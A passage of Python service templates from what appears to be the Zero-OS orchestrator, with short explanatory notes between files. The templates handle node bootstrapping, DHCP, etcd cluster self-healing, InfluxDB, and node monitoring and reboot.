# connection succeeded, set the hostname of the node to zerotier member
member['name'] = node.name
member['description'] = node.client.info.os().get('hostname', '')
zerotier.network.updateMember(member, member['nodeId'], netid)
# create node.zero-os service
name = node.name
try:
nodeservice = service.aysrepo.serviceGet(role='node', instance=name)
logger.info("service for node {} already exists, updating model".format(name))
# make sure the service has the correct ip in its model.
# it could happen that a node gets a new ip after a reboot
nodeservice.model.data.redisAddr = zerotier_ip
nodeservice.model.data.status = 'running'
# after a reboot we also want to call install
nodeservice.executeAction('install', context=job.context)
except j.exceptions.NotFound:
# run the hardware checks
for prod in service.producers.get('hardwarecheck', []):
prod.executeAction('check', args={'ipaddr': zerotier_ip,
'node_id': member['nodeId'],
'jwt': get_jwt_token(service.aysrepo)})
# create and install the node.zero-os service
if service.model.data.wipedisks:
node.wipedisks()
node_actor = service.aysrepo.actorGet('node.zero-os')
networks = [n.name for n in service.producers.get('network', [])]
hostname = node.client.info.os()['hostname']
if hostname == 'zero-os':
hostname = 'zero-os-%s' % name
node_args = {
'id': name,
'status': 'running',
'networks': networks,
'hostname': hostname,
'redisAddr': zerotier_ip,
}
logger.info("create node.zero-os service {}".format(name))
nodeservice = node_actor.serviceCreate(instance=name, args=node_args)
try:
logger.info("install node.zero-os service {}".format(name))
nodeservice.executeAction('install', context=job.context)
except:
nodeservice.delete()
raise
# do ERP registrations
for prod in service.producers.get('erp_registration', []):
prod.executeAction('register', args={'node_id': name, 'zerotier_address': member['nodeId']})
def processChange(job):
service = job.service
args = job.model.args
category = args.pop('changeCategory')
if category == "dataschema":
ztID = job.model.args.get('zerotierNetID')
if ztID:
service.model.data.zerotierNetID = ztID
token = job.model.args.get('zerotierToken')
if token:
service.model.data.zerotierToken = token
def monitor(job):
pass
```
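The bootstrap action above relies twice on Python's `for`/`else` idiom to poll with a bounded number of attempts (waiting for the ZeroTier IP assignment and for the freshly authorized node to answer a ping). A minimal, self-contained sketch of that pattern is shown below; the `probe` callable, attempt count, and delay are illustrative and not part of the template.

```python
import time

def wait_until(probe, attempts=20, delay=1.0):
    """Poll `probe` until it returns True; raise if it never does within `attempts` tries."""
    for _ in range(attempts):
        if probe():
            break
        time.sleep(delay)
    else:
        # the else branch of a for loop runs only when the loop finished without a break
        raise RuntimeError("condition not met after %d attempts" % attempts)

# usage sketch: wait_until(lambda: bool(member['config']['ipAssignments']))
```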
#### File: templates/dhcp/actions.py
```python
from js9 import j
def start(job):
gateway = job.service.parent.consumers['gateway'][0]
gwdata = gateway.model.data.to_dict()
apply_config(job, gwdata)
def apply_config(job, gwdata=None):
import ipaddress
from zeroos.orchestrator.sal.Container import Container
from zeroos.orchestrator.sal.gateway.dhcp import DHCP
from zeroos.orchestrator.configuration import get_jwt_token
service = job.service
job.context['token'] = get_jwt_token(job.service.aysrepo)
container = Container.from_ays(job.service.parent, job.context['token'], logger=job.service.logger)
gwdata = {} if gwdata is None else gwdata
nics = gwdata.get('nics', [])
dhcpservers = []
for nic in nics:
dhcpserver = nic.get('dhcpserver')
if not dhcpserver:
continue
cidr = ipaddress.IPv4Interface(nic['config']['cidr'])
dhcpserver['subnet'] = str(cidr.network.network_address)
dhcpserver['gateway'] = str(cidr.ip)
dhcpserver['interface'] = nic['name']
dhcpservers.append(dhcpserver)
dhcp = DHCP(container, gwdata['domain'], dhcpservers)
dhcp.stop()
service.model.data.status = 'halted'
service.saveAll()
dhcp.apply_config()
service.model.data.status = 'running'
service.saveAll()
def update(job):
apply_config(job, job.model.args)
def watchdog_handler(job):
import asyncio
loop = j.atyourservice.server.loop
gateway = job.service.parent.consumers['gateway'][0]
if gateway.model.data.status == 'running':
asyncio.ensure_future(job.service.asyncExecuteAction('start', context=job.context), loop=loop)
```
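For reference, the per-NIC DHCP settings built in `apply_config` above come straight from the NIC's CIDR via the standard-library `ipaddress` module. A standalone sketch with made-up values:

```python
import ipaddress

cidr = ipaddress.IPv4Interface('192.168.10.1/24')   # example CIDR, not taken from the template
dhcpserver = {
    'subnet': str(cidr.network.network_address),    # '192.168.10.0'
    'gateway': str(cidr.ip),                        # '192.168.10.1'
    'interface': 'nic0',                            # hypothetical NIC name
}
print(dhcpserver)
```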
#### File: templates/etcd_cluster/actions.py
```python
from js9 import j
def input(job):
if job.model.args.get('etcds', []) != []:
raise j.exceptions.Input("etcds should not be set as input")
nodes = job.model.args.get('nodes', [])
if not nodes:
raise j.exceptions.Input("Invalid amount of nodes provided")
def init(job):
configure(job)
def ensureStoragepool(job, node):
"""
:param job: currently executing job object
:param node: node object from the zeroos.orchestrator.sal library
"""
from zeroos.orchestrator.sal.StoragePool import StoragePools
from zeroos.orchestrator.utils import find_disks
service = job.service
# prefer NVMe, fall back to SSD, and otherwise use the fscache storage pool, whatever it may be
free_disks = find_disks('nvme', [node], 'sp_etcd_')
if not free_disks[node.name]:
free_disks = find_disks('ssd', [node], 'sp_etcd_')
if not free_disks[node.name]:
return "{}_fscache".format(node.name)
# StoragePools.create() takes a list of devices, so pick the first free disk and wrap it in a list
devices = [free_disks[node.name][0].devicename]
storagePool = StoragePools(node).create('etcd_%s' % service.name, devices, 'single', 'single')
storagePool.mount()
storagePoolService = storagePool.ays.create(service.aysrepo)
return storagePoolService.name
def configure(job):
import random
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
from zeroos.orchestrator.configuration import get_configuration
service = job.service
job.context['token'] = get_jwt_token(job.service.aysrepo)
config = get_configuration(service.aysrepo)
nodes = set()
for node_service in service.producers['node']:
nodes.add(Node.from_ays(node_service, job.context['token']))
nodes = list(nodes)
if len(nodes) % 2 == 0:
nodes = random.sample(nodes, len(nodes) - 1)
etcd_actor = service.aysrepo.actorGet("etcd")
container_actor = service.aysrepo.actorGet("container")
fsactor = service.aysrepo.actorGet("filesystem")
etcd_args = {}
peers = []
etcds = []
flist = config.get('etcd-flist', 'https://hub.gig.tech/gig-official-apps/etcd-release-3.2.flist')
for node in nodes:
baseports, tcpservices = get_baseports(job, node, baseport=2379, nrports=2)
containername = '{}_{}_{}_{}'.format(service.name, 'etcd', node.name, baseports[1])
args = {
'storagePool': ensureStoragepool(job, node),
'name': containername,
}
old_filesystem_service = service.aysrepo.servicesFind(name=containername, role='filesystem')
if old_filesystem_service:
node.client.filesystem.remove('/mnt/storagepools/%s/filesystems/%s/member' % (args['storagePool'], containername))
fsactor.serviceCreate(instance=containername, args=args)
# create container
data_dir = '/mnt/data'
args = {
'node': node.name,
'flist': flist,
'mounts': [{'filesystem': containername, 'target': data_dir}],
'hostNetworking': True,
}
container_actor.serviceCreate(instance=containername, args=args)
server_bind = '{}:{}'.format(node.storageAddr, baseports[1])
client_bind = '{}:{}'.format(node.storageAddr, baseports[0])
mgmt_client_bind = '{}:{}'.format(node.addr, baseports[0])
etcd_args[node.name] = {
"serverBind": server_bind,
"clientBind": client_bind,
"container": containername,
"mgmtClientBind": mgmt_client_bind,
"tcps": tcpservices,
"homeDir": data_dir,
}
etcdID = "{}_{}_{}".format(service.name, node.name, baseports[1])
if service.aysrepo.servicesFind(name=etcdID, role='etcd'):
etcdID = "%s_recovered" % etcdID
peers.append("{}=http://{}".format(etcdID, server_bind))
for k, v in etcd_args.items():
tcps = v.pop("tcps")
etcdname = "{}_{}_{}".format(service.name, k, tcps[1].model.data.port)
if service.aysrepo.servicesFind(name=etcdname, role='etcd'):
etcdname = "%s_recovered" % etcdname
v["peers"] = peers
etcd_service = etcd_actor.serviceCreate(instance=etcdname, args=v)
etcd_service.consume(tcps[0])
etcd_service.consume(tcps[1])
etcds.append(etcd_service.name)
service.consume(etcd_service)
service.model.data.etcds = etcds
def install(job):
service = job.service
service.model.data.status = "running"
service.saveAll()
def get_baseports(job, node, baseport, nrports):
service = job.service
tcps = service.aysrepo.servicesFind(role='tcp', parent='node.zero-os!%s' % node.name)
usedports = set()
for tcp in tcps:
usedports.add(tcp.model.data.port)
freeports = []
tcpactor = service.aysrepo.actorGet("tcp")
tcpservices = []
while True:
if baseport not in usedports:
baseport = node.freeports(baseport=baseport, nrports=1)[0]
args = {
'node': node.name,
'port': baseport,
}
tcp = 'tcp_{}_{}'.format(node.name, baseport)
tcpservices.append(tcpactor.serviceCreate(instance=tcp, args=args))
freeports.append(baseport)
if len(freeports) >= nrports:
return freeports, tcpservices
baseport += 1
def check_container_etcd_status(job, etcd):
'''
Checks the status of both the container and etcd, since we cannot check the status of etcd unless the container is running.
:param job: job called from the watchdog_handler action
:param etcd: etcd service whose parent container is checked
'''
try:
container = etcd.parent
container_client, container_status = check_container_status(job, container)
if container_status:
container_client.client.job.list("etcd.{}".format(etcd.name))
return True, True
return False, False
except RuntimeError as e:
return True, False
def check_container_status(job, container):
'''
Checks the status of the container while avoiding errors if the node is down.
:param job: job called from the watchdog_handler action
:param container: container service
'''
from zeroos.orchestrator.sal.Container import Container
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
try:
container_client = Container.from_ays(container,
password=job.context['token'],
logger=job.service.logger,
timeout=5)
if container_client.id:
# if returns empty means the container is down
return container_client, True
return None, False
except ConnectionError as e:
# to catch exception if node is down
return None, False
def watchdog_handler(job):
'''
This action is called from either a container or etcd watchdog handler, which in turn are called from the node
service's watchdog. It self-heals the etcd cluster: a failed etcd is redeployed, a failed container is redeployed,
and if the cluster goes into disaster (the number of dead etcds exceeds (n-1)/2) the whole cluster is redeployed
on the nodes available in the environment and the configurations of the storage clusters and vdisks are saved again.
'''
import asyncio
async def selfhealing(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
import redis
# needs refactoring: after the refactor, disabled services will be detected by each service's own watchdog handler,
# so this handler can focus only on the recovery
service = job.service
if service.model.data.status == 'recovering':
return
if not service.aysrepo.servicesFind(role='node'):
return
service.model.data.status = 'recovering'
etcds = set(service.producers.get('etcd', []))
working_etcds = set()
dead_nodes = set()
dead_etcds_working_containers = set()
working_model_nodes = set()
token = get_jwt_token(job.service.aysrepo)
job.context['token'] = token
service.saveAll()
# check the etcd container, since the watchdog will handle the actual service
for etcd in etcds:
container_status, etcd_status = check_container_etcd_status(job, etcd)
if not etcd_status and container_status:
dead_etcds_working_containers.add(etcd)
if etcd_status:
working_etcds.add(etcd)
dead_etcds_containers = etcds-working_etcds
for etcd in dead_etcds_containers:
container = etcd.parent
node = container.parent
try:
node_client = Node.from_ays(node, password=<PASSWORD>, timeout=20)
ping = node_client.client.ping()
working_model_nodes.add(node)
except (redis.TimeoutError, ConnectionError) as e:
ping = None
dead_nodes.add(node.name)
# if the number of failures is below the disaster threshold, do a normal respawn of a single etcd (or container and etcd)
if len(working_etcds) > (len(etcds)-1)/2:
# respawn dead etcd only
for etcd in dead_etcds_working_containers:
await etcd.asyncExecuteAction('start', context=job.context)
service.model.data.status = 'running'
service.saveAll()
service.logger.info("etcd %s respawned" % etcd.name)
return
# respawn dead containers
if not ping:
raise j.exceptions.RuntimeError("node %s with Etcd %s is down" % (node.name, etcd.name))
await container.asyncExecuteAction('start', context=job.context)
service.model.data.status = 'running'
await etcd.asyncExecuteAction('start', context=job.context)
service.saveAll()
service.logger.info("etcd %s and container %s respawned" % (etcd.name, container.name))
return
# stop all remaining containers from the old cluster
try:
for etcd in working_etcds:
await etcd.asyncExecuteAction('stop', context=job.context)
await etcd.parent.asyncExecuteAction('stop', context=job.context)
# clean up all remaining tcps on the old running nodes
for etcd in service.producers['etcd']:
for tcp in etcd.producers['tcp']:
try:
Node.from_ays(etcd.parent.parent, password=<PASSWORD>, timeout=5)
await tcp.asyncExecuteAction('drop', context=job.context)
except ConnectionError:
continue
await tcp.asyncExecuteAction('delete', context=job.context)
# gather the running nodes that can host the redeployed cluster
tmp = list()
for node in [service for service in service.aysrepo.servicesFind(role='node')]:
if node.model.data.status == 'running':
tmp.append(node.name)
all_nodes = set(tmp)
if len(working_model_nodes) > 1:
service.model.data.nodes = [node.name for node in working_model_nodes]
else:
service.model.data.nodes = list(all_nodes - dead_nodes)
# remove old nodes and etcds from producers (has to be here)
for etcd_service in service.producers['etcd']:
service.model.producerRemove(etcd_service)
service.saveAll()
for node_service in service.producers['node']:
if node_service.name not in service.model.data.nodes:
service.model.producerRemove(node_service)
service.saveAll()
# consume new nodes.
node_services = [service.aysrepo.serviceGet(instance=node, role='node')for node in service.model.data.nodes]
for node_service in node_services:
service.consume(node_service)
service.model.data.etcds = []
service.saveAll()
await service.asyncExecuteAction('configure', context=job.context)
# install all services created by the configure of the etcd_cluster
etcd_services = [service.aysrepo.serviceGet(instance=i, role='etcd') for i in service.model.data.etcds]
for etcd in etcd_services:
for mount in etcd.parent.model.data.mounts:
fs = service.aysrepo.serviceGet('filesystem', mount.filesystem)
await fs.asyncExecuteAction('install', context=job.context)
for tcp in etcd.producers['tcp']:
await tcp.asyncExecuteAction('install', context=job.context)
await etcd.parent.asyncExecuteAction('install', context=job.context)
await etcd.asyncExecuteAction('install', context=job.context)
# save all vdisks to new etcd cluster
vdisks = service.aysrepo.servicesFind(role='vdisk')
for vdisk in vdisks:
await vdisk.asyncExecuteAction('save_config', context=job.context)
# save all storage cluster to new etcd cluster
storagecluster_block_services = service.aysrepo.servicesFind(role='storagecluster.block')
for storagecluster_block_service in storagecluster_block_services:
await storagecluster_block_service.asyncExecuteAction('save_config', context=job.context)
storagecluster_object_services = service.aysrepo.servicesFind(role='storagecluster.object')
for storagecluster_object_service in storagecluster_object_services:
await storagecluster_object_service.asyncExecuteAction('save_config', context=job.context)
# restart all runnning vms
vmachines = service.aysrepo.servicesFind(role='vm')
for vmachine in vmachines:
if vmachine.model.data.status == 'running':
await vmachine.asyncExecuteAction('start', context=job.context)
finally:
service.model.data.status = 'running'
service.saveAll()
for etcd_service in service.aysrepo.servicesFind(role='etcd'):
if etcd_service.model.data.status != 'running':
container_status, etcd_status = check_container_etcd_status(job, etcd_service.parent)
if not etcd_status:
await etcd_service.parent.asyncExecuteAction('delete', context=job.context)
service.logger.info("etcd_cluster %s respawned" % service.name)
loop = job.service._loop
asyncio.ensure_future(selfhealing(job), loop=loop)
```
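Two numeric rules drive the cluster logic above: `configure` keeps the etcd member count odd (dropping one node at random when an even number is available), and `watchdog_handler` only attempts a simple respawn while a majority of members is still alive. A small sketch of both checks, detached from the AYS services (node names are examples):

```python
import random

def choose_members(nodes):
    """etcd wants an odd member count; drop one node at random if the count is even."""
    if len(nodes) % 2 == 0:
        nodes = random.sample(nodes, len(nodes) - 1)
    return nodes

def simple_respawn_possible(working, total):
    """True while a majority is alive, i.e. fewer than (total - 1) / 2 members are dead."""
    return working > (total - 1) / 2

print(choose_members(['n1', 'n2', 'n3', 'n4']))   # any three of the four nodes
print(simple_respawn_possible(2, 3))              # True: one dead member out of three is tolerable
```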
#### File: templates/influxdb/actions.py
```python
def get_container(service, force=True):
containers = service.producers.get('container')
if not containers:
if force:
raise RuntimeError('Service didn\'t consume any containers')
else:
return
return containers[0]
def init(job):
from zeroos.orchestrator.configuration import get_configuration
service = job.service
container_actor = service.aysrepo.actorGet('container')
config = get_configuration(service.aysrepo)
args = {
'node': service.model.data.node,
'flist': config.get(
'influxdb-flist', 'https://hub.gig.tech/gig-official-apps/influxdb.flist'),
'hostNetworking': True
}
cont_service = container_actor.serviceCreate(instance='{}_influxdb'.format(service.name), args=args)
service.consume(cont_service)
def install(job):
start(job)
def start(job):
from zeroos.orchestrator.sal.Container import Container
from zeroos.orchestrator.sal.influxdb.influxdb import InfluxDB
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
service.model.data.status = 'running'
container = get_container(service)
container.executeAction('start', context=job.context)
container_ays = Container.from_ays(container, job.context['token'], logger=service.logger)
influx = InfluxDB(
container_ays, service.parent.model.data.redisAddr, service.model.data.port,
service.model.data.rpcport)
influx.start()
influx.create_databases(service.model.data.databases)
service.saveAll()
def stop(job):
from zeroos.orchestrator.sal.Container import Container
from zeroos.orchestrator.sal.influxdb.influxdb import InfluxDB
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
service.model.data.status = 'halted'
container = get_container(service)
container_ays = Container.from_ays(container, job.context['token'], logger=service.logger)
if container_ays.is_running():
influx = InfluxDB(
container_ays, service.parent.model.data.redisAddr, service.model.data.port,
service.model.data.rpcport)
influx.stop()
container.executeAction('stop', context=job.context)
service.model.data.status = 'halted'
service.saveAll()
def uninstall(job):
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
container = get_container(service, False)
if container:
stop(job)
container.delete()
service.delete()
def processChange(job):
from zeroos.orchestrator.sal.Container import Container
from zeroos.orchestrator.sal.influxdb.influxdb import InfluxDB
from zeroos.orchestrator.configuration import get_jwt_token_from_job
service = job.service
args = job.model.args
if args.pop('changeCategory') != 'dataschema' or service.model.actionsState['install'] in ['new', 'scheduled']:
return
container_service = get_container(service)
container = Container.from_ays(container_service, get_jwt_token_from_job(job), logger=service.logger)
influx = InfluxDB(
container, service.parent.model.data.redisAddr, service.model.data.port,
service.model.data.rpcport)
if 'port' in args:
service.model.data.port = args['port']
if container.is_running() and influx.is_running()[0]:
influx.stop()
influx.port = args['port']
influx.start()
if args.get('databases'):
if container.is_running() and influx.is_running()[0]:
create_dbs = set(args['databases']) - set(service.model.data.databases)
drop_dbs = set(service.model.data.databases) - set(args['databases'])
influx.create_databases(create_dbs)
influx.drop_databases(drop_dbs)
service.model.data.databases = args['databases']
service.saveAll()
def monitor(job):
pass
def init_actions_(service, args):
return {
'init': [],
'install': ['init'],
'monitor': ['start'],
'delete': ['uninstall'],
'uninstall': [],
}
```
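The `processChange` action above reconciles the configured InfluxDB databases with the requested ones through plain set arithmetic. The same idea in isolation (database names are invented):

```python
current = {'statistics', 'telemetry'}    # databases currently in the service model (example values)
requested = {'telemetry', 'billing'}     # databases passed in the change request

create_dbs = requested - current         # {'billing'}    -> influx.create_databases(create_dbs)
drop_dbs = current - requested           # {'statistics'} -> influx.drop_databases(drop_dbs)
print(sorted(create_dbs), sorted(drop_dbs))
```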
#### File: templates/node.zero-os/actions.py
```python
from js9 import j
def get_stats_collector(service):
stats_collectors_services = service.consumers.get('stats_collector')
if stats_collectors_services:
return stats_collectors_services[0]
def get_statsdb(service):
statsdb_services = service.aysrepo.servicesFind(role='statsdb')
if statsdb_services:
return statsdb_services[0]
def get_version(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
service = job.service
if service.model.data.status != 'running':
version = ''
else:
node = Node.from_ays(service, get_jwt_token(job.service.aysrepo))
pong = node.client.ping()
version = pong.split('Version: ')[1] if pong else ''
service.model.data.version = version
service.saveAll()
return version
def input(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_configuration, get_jwt_token
args = job.model.args
ip = args.get('redisAddr')
node = Node(ip, args.get('redisPort'), get_jwt_token(job.service.aysrepo))
config = get_configuration(job.service.aysrepo)
version = node.client.info.version()
core0_version = config.get('0-core-version')
core0_revision = config.get('0-core-revision')
if (core0_version and core0_version != version['branch']) or \
(core0_revision and core0_revision != version['revision']):
raise RuntimeError(
'Node with IP {} has a wrong version. Found version {}@{} and expected version {}@{} '.format(
ip, version['branch'], version['revision'], core0_version, core0_revision))
def init(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
service = job.service
node = Node.from_ays(service, get_jwt_token(service.aysrepo))
job.logger.info('create storage pool for fuse cache')
poolname = '{}_fscache'.format(service.name)
storagepool = node.ensure_persistance(poolname)
storagepool.ays.create(service.aysrepo)
statsdb_service = get_statsdb(service)
if statsdb_service:
stats_collector_actor = service.aysrepo.actorGet('stats_collector')
args = {
'node': service.name,
'port': statsdb_service.model.data.port,
'ip': statsdb_service.parent.model.data.redisAddr,
}
stats_collector_service = stats_collector_actor.serviceCreate(instance=service.name, args=args)
stats_collector_service.consume(service)
def getAddresses(job):
service = job.service
networks = service.producers.get('network', [])
networkmap = {}
for network in networks:
networkmap[network.name] = network.executeAction('getAddresses', args={'node_name': service.name})
return networkmap
def install(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
# at each boot recreate the complete state in the system
service = job.service
node = Node.from_ays(service, get_jwt_token(job.service.aysrepo))
get_version(job)
job.logger.info('mount storage pool for fuse cache')
poolname = '{}_fscache'.format(service.name)
node.ensure_persistance(poolname)
# Set host name
node.client.system('hostname %s' % service.model.data.hostname).get()
node.client.bash('echo %s > /etc/hostname' % service.model.data.hostname).get()
job.logger.info('configure networks')
for network in service.producers.get('network', []):
network.executeAction('configure', args={'node_name': service.name})
stats_collector_service = get_stats_collector(service)
statsdb_service = get_statsdb(service)
if stats_collector_service and statsdb_service and statsdb_service.model.data.status == 'running':
stats_collector_service.executeAction('install', context=job.context)
node.client.bash('modprobe ipmi_si && modprobe ipmi_devintf').get()
def monitor(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.sal.healthcheck import HealthCheckObject
from zeroos.orchestrator.configuration import get_jwt_token, get_configuration
service = job.service
config = get_configuration(service.aysrepo)
token = get_jwt_token(job.service.aysrepo)
job.context['token'] = token
install_action = service.model.actionsState['install']
if install_action != 'ok' and install_action != 'error':
return
healthcheck_service = job.service.aysrepo.serviceGet(role='healthcheck',
instance='node_%s' % service.name,
die=False)
if healthcheck_service is None:
healthcheck_actor = service.aysrepo.actorGet('healthcheck')
healthcheck_service = healthcheck_actor.serviceCreate(instance='node_%s' % service.name)
service.consume(healthcheck_service)
nodestatus = HealthCheckObject('nodestatus', 'Node Status', 'Node Status', '/nodes/{}'.format(service.name))
node = Node.from_ays(service, token, timeout=5)
state = node.is_running()
if state:
service.model.data.status = 'running'
configured = node.is_configured(service.name)
if not configured:
service.executeAction('install', context=job.context)
for consumer in service.getConsumersRecursive():
consumer.self_heal_action('monitor')
stats_collector_service = get_stats_collector(service)
statsdb_service = get_statsdb(service)
# Check if statsdb is installed on this node and start it if needed
if (statsdb_service and str(statsdb_service.parent) == str(job.service)
and statsdb_service.model.data.status != 'running'):
statsdb_service.executeAction('start', context=job.context)
# Check if there is a running statsdb and if so make sure stats_collector for this node is started
if (stats_collector_service and statsdb_service and stats_collector_service.model.data.status != 'running'
and statsdb_service.model.data.status == 'running'):
stats_collector_service.executeAction('start', context=job.context)
# healthchecks
nodestatus.add_message('node', 'OK', 'Node is running')
update_healthcheck(job, healthcheck_service, node.healthcheck.openfiledescriptors())
update_healthcheck(job, healthcheck_service, node.healthcheck.cpu_mem())
update_healthcheck(job, healthcheck_service, node.healthcheck.rotate_logs())
update_healthcheck(job, healthcheck_service, node.healthcheck.network_bond())
update_healthcheck(job, healthcheck_service, node.healthcheck.interrupts())
update_healthcheck(job, healthcheck_service, node.healthcheck.context_switch())
update_healthcheck(job, healthcheck_service, node.healthcheck.threads())
update_healthcheck(job, healthcheck_service, node.healthcheck.qemu_vm_logs())
update_healthcheck(job, healthcheck_service, node.healthcheck.network_load())
update_healthcheck(job, healthcheck_service, node.healthcheck.disk_usage())
update_healthcheck(job, healthcheck_service, node.healthcheck.ssh_cleanup(job=job))
flist = config.get('healthcheck-flist', 'https://hub.gig.tech/gig-official-apps/healthcheck.flist')
with node.healthcheck.with_container(flist) as cont:
update_healthcheck(job, healthcheck_service, node.healthcheck.node_temperature(cont))
update_healthcheck(job, healthcheck_service, node.healthcheck.powersupply(cont))
update_healthcheck(job, healthcheck_service, node.healthcheck.fan(cont))
# check network stability of node with the rest of the nodes ! TODO
else:
if service.model.data.status != 'rebooting':
service.model.data.status = 'halted'
nodestatus.add_message('node', 'ERROR', 'Node is halted')
update_healthcheck(job, healthcheck_service, nodestatus.to_dict())
get_version(job)
service.saveAll()
def update_healthcheck(job, health_service, healthchecks):
import time
service = job.service
interval = service.model.actionGet('monitor').period
new_healthchecks = list()
if not isinstance(healthchecks, list):
healthchecks = [healthchecks]
defaultresource = '/nodes/{}'.format(service.name)
for health_check in healthchecks:
for health in health_service.model.data.healthchecks:
# If this healthcheck already exists, update its attributes
if health.id == health_check['id']:
health.name = health_check.get('name', '')
health.resource = health_check.get('resource', defaultresource) or defaultresource
health.messages = health_check.get('messages', [])
health.category = health_check.get('category', '')
health.lasttime = time.time()
health.interval = interval
health.stacktrace = health_check.get('stacktrace', '')
break
else:
# healthcheck doesn't exist in the current list, add it to the list of new
health_check['lasttime'] = time.time()
health_check['interval'] = interval
new_healthchecks.append(health_check)
old_healthchecks = health_service.model.data.to_dict().get('healthchecks', [])
old_healthchecks.extend(new_healthchecks)
health_service.model.data.healthchecks = old_healthchecks
def reboot(job):
import time
import redis
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
token = get_jwt_token(job.service.aysrepo)
job.context['token'] = token
service = job.service
service._recurring_tasks['monitor'].stop()
try:
start = time.time()
# Make sure any running monitor action finishes before we reboot
while time.time() < start + 60:
if not j.core.jobcontroller.db.jobs.list(
actor='node.zero-os', action='monitor', state='running', service=service.name):
break
time.sleep(1)
else:
raise j.exceptions.RuntimeError('Failed to reboot node. Waiting for monitoring action for too long')
force_reboot = service.model.data.forceReboot
vms = service.consumers.get('vm') or []
for vm in vms:
if vm.model.data.status != 'halted':
if not force_reboot:
raise j.exceptions.RuntimeError(
'Failed to reboot node. Force reboot is not enabled and some vms are not halted')
else:
vm.executeAction('shutdown', context=job.context)
service.model.data.status = 'rebooting'
job.logger.info('reboot node {}'.format(service))
node = Node.from_ays(service, job.context['token'])
node.client.raw('core.reboot', {})
finally:
start = time.time()
while time.time() < start + 10:
try:
node = Node.from_ays(service, token, timeout=5)
node.client.testConnectionAttempts = 0
node.client.ping()
except (RuntimeError, ConnectionError, redis.TimeoutError, TimeoutError):
break
time.sleep(1)
else:
job.logger.info("Node was still reachable 10 seconds after the reboot command")
service._recurring_tasks['monitor'].start()
def uninstall(job):
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
stats_collector_service = get_stats_collector(service)
if stats_collector_service:
stats_collector_service.executeAction('uninstall', context=job.context)
statsdb_service = get_statsdb(service)
if statsdb_service and str(statsdb_service.parent) == str(service):
statsdb_service.executeAction('uninstall', context=job.context)
bootstraps = service.aysrepo.servicesFind(actor='bootstrap.zero-os')
if bootstraps:
bootstraps[0].executeAction('delete_node', args={'node_name': service.name})
# Remove etcd_cluster if this was the last node service
node_services = service.aysrepo.servicesFind(role='node')
if len(node_services) > 1:
return
for etcd_cluster_service in service.aysrepo.servicesFind(role='etcd_cluster'):
etcd_cluster_service.executeAction('delete', context=job.context)
etcd_cluster_service.delete()
def watchdog(job):
from zeroos.orchestrator.sal.Pubsub import Pubsub
from zeroos.orchestrator.configuration import get_jwt_token
from asyncio import sleep
import asyncio
import re
import traceback
service = job.service
watched_roles = {
'nbdserver': {
'level': 20,
'message': (re.compile('.*'),),
'eof': True
},
'tlogserver': {
'eof': True,
},
'ork': {
'level': 20,
'instance': job.service.name,
'service': 'node',
'eof': False,
'message': (re.compile('.*'),),
'handler': 'ork_handler',
},
'kvm': {
'level': 20,
'instance': job.service.name,
'service': 'node',
'eof': False,
'message': (re.compile('.*'),),
'handler': 'vm_handler',
'sub_id': 'events',
},
'cloudinit': {
'eof': True,
},
'http': {
'eof': True,
},
'dhcp': {
'eof': True,
},
'storage_engine': {
'eof': True,
},
"etcd": {
"eof": True,
},
'stats_collector': {
'eof': True,
},
'zerostor': {
'eof': True,
},
'container': {
"eof": True,
},
}
async def callback(jobid, level, message, flag):
if '.' not in jobid:
return
role, sub_id = jobid.split('.', 1)
if (role not in watched_roles or
watched_roles[role].get('level', level) != level
or watched_roles[role].get('sub_id', sub_id) != sub_id):
return
service_role = watched_roles[role].get('service', role)
instance = watched_roles[role].get('instance', sub_id)
eof = flag & 0x6 != 0
valid_message = False
matched_messages = watched_roles[role].get('message', ())
for msg in matched_messages:
if msg.match(message):
valid_message = True
if not valid_message and not (watched_roles[role]['eof'] and eof):
return
srv = service.aysrepo.serviceGet(role=service_role, instance=instance, die=False)
if srv:
args = {'message': message, 'eof': eof, 'level': level}
job.context['token'] = get_jwt_token(job.service.aysrepo)
handler = watched_roles[role].get('handler', 'watchdog_handler')
await srv.asyncExecuteAction(handler, context=job.context, args=args)
async def check_node(job):
job.context['token'] = get_jwt_token(job.service.aysrepo)
try:
cl = Pubsub(service._loop, service.model.data.redisAddr, password=job.context['token'], callback=callback)
await cl.ping()
service.model.data.status = 'running'
except (RuntimeError, OSError) as e:
service.model.data.status = 'halted'
async def streaming(job):
# Check if the node is running
while service.model.actionsState['install'] != 'ok':
await sleep(5)
while str(service.model.data.status) != 'running':
await sleep(5)
# Add the looping here instead of the pubsub sal
cl = None
subscribed = None
while True:
if str(service.model.data.status) != 'running':
await sleep(5)
continue
if cl is None:
job.context['token'] = get_jwt_token(job.service.aysrepo)
cl = Pubsub(service._loop, service.model.data.redisAddr, password=job.context['token'], callback=callback)
try:
if not subscribed:
queue = await cl.subscribe('ays.monitor')
subscribed = True
await cl.global_stream(queue)
except asyncio.TimeoutError as e:
job.logger.error(e)
await check_node(job)
cl = None
subscribed = None
except OSError as e:
job.logger.error(e)
await check_node(job)
cl = None
subscribed = None
except RuntimeError as e:
job.logger.error(e)
await check_node(job)
cl = None
subscribed = None
except Exception as e:
job.logger.error(traceback.format_exc())
await check_node(job)
cl = None
subscribed = None
return streaming(job)
def nic_shutdown(job, message):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
service = job.service
node = Node.from_ays(service, get_jwt_token(service.aysrepo))
interface = message['name']
